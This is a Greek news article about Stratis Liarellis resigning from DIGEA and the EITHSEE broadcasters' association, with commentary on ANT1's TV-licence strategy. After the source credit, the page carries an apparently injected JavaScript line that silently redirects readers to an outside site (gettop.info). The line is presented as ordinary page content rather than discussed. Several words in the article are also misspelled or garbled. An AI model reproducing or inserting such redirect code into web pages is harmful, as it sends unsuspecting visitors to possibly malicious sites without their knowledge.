Διπλή παραίτηση Λιαρέλλη από DIGEA και ΕΙΤΗΣΕΕ

0
12

 

Την παραίτηση του υπέβαλε σχεδόν ταυτόχρονα ο διευθύνων σύμβουλος του ΑΝΤ1 Στρατής Λιαρέλλης τόσο από τη θέση του προέδρου της DIGEA αλλά και από το ΔΣ της ΕΙΤΗΣΕΕ (Ένωση Ιδιωτικών Τηλεοπτικών Σταθμών Εθνικής Εμβέλειας).

Παρά το γεγονός ότι ως αιτία αραίτησης και από τις δύο θέσιες επικαλέστηκε αυξηένες επαγγελμαιτκές πυοχρεώσεις και φόρτο εργασίας, μάλλον συμφωνα με τα σενάρια ο Στρατής Λιαρέλλης ήθελε να απομακρυνθεί από δύο εστίες έντασης που αφορούν στις τηλεοπτικές άδειες.

Είναι δύσκολο να αποσυνδεθούν οι παραιτήσεις Λιαρέλλη από τις εξελίξεις στο πεδίο των τηλεοπτικών αδειών διότι, τόσο η DIGEA όσο και η ΕΙΤΗΣΕΕ, είναι δύο πόλοι που εμπλέκονται και επηρεάζονται, βρίσκονται στο μεταίχμιο του παλιού και του νέου τοπίου, ενώ συμβολίζουν για ένα μεγάλο κομμάτι της κοινής γνώμης τη διαπλοκή.

Ο ΑΝΤ1 που συμμετείχε στον διαγωνισμό για τις τηλεοπτικές άδειες κατέβαλε το μεγαλύτερο τίμημα, αντιπολιτεύεται την κυβέρνηση, αλλά ταυτόχρονα κρατά χαμηλούς τόνους σε σχέση με τους ανταγωνιστές του, αποφεύγει να συμμετέχει σε πολιτικά παιχνίδια… Και το μόνο που τον ενδιαφέρει σε αυτή τη φάση, ασκώντας πιέσεις στην κυβέρνηση να «καθαρίσει» το τοπίο από τα κανάλια που δεν αδειοδοτήθηκαν, είναι να ρεφάρει, μαζεύοντας όλο το «χαρτί» από τη διαφήμιση.

Είναι φανερό λοιπόν ότι το κανάλι του Αμαρουσίου επιλέγει να μην εμπλακεί στην πολιτικολογία της εποχής. Κοιτάει αυστηρά τον στόχο του που δεν είναι άλλος από το να αποσβέσει το συντομότερο δυνατό το τίμημα που κατέβαλε για να αποκτήσει την τηλεοπτική άδεια… Και κρατά αποστάσεις από οργανισμούς που ενδεχομένως το επόμενο διάστημα αποτελέσουν εστίες έντασης. Όπως για παράδειγμα η DIGEA στην περίπτωση που χρειαστεί να ρίξει «μαύρο» σε κανάλια των οποίων οι μέτοχοι είναι και ιδιοκτήτες της!

Τέλος ως προς την ΕΙΤΗΣΕΕ, δεν υπάρχει αμφιβολία ότι είναι ένα σωματείο χωρίς λόγο ύπαρξης… Αφού οι νέοι καναλάρχες έχουν διαφορετικές επιδιώξεις και συμφέροντα που δεν ταυτίζονται με αυτά των παλιών που δεν κατάφεραν να αδειοδοτηθούν.

Πηγή: enimerosi24.gr
setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here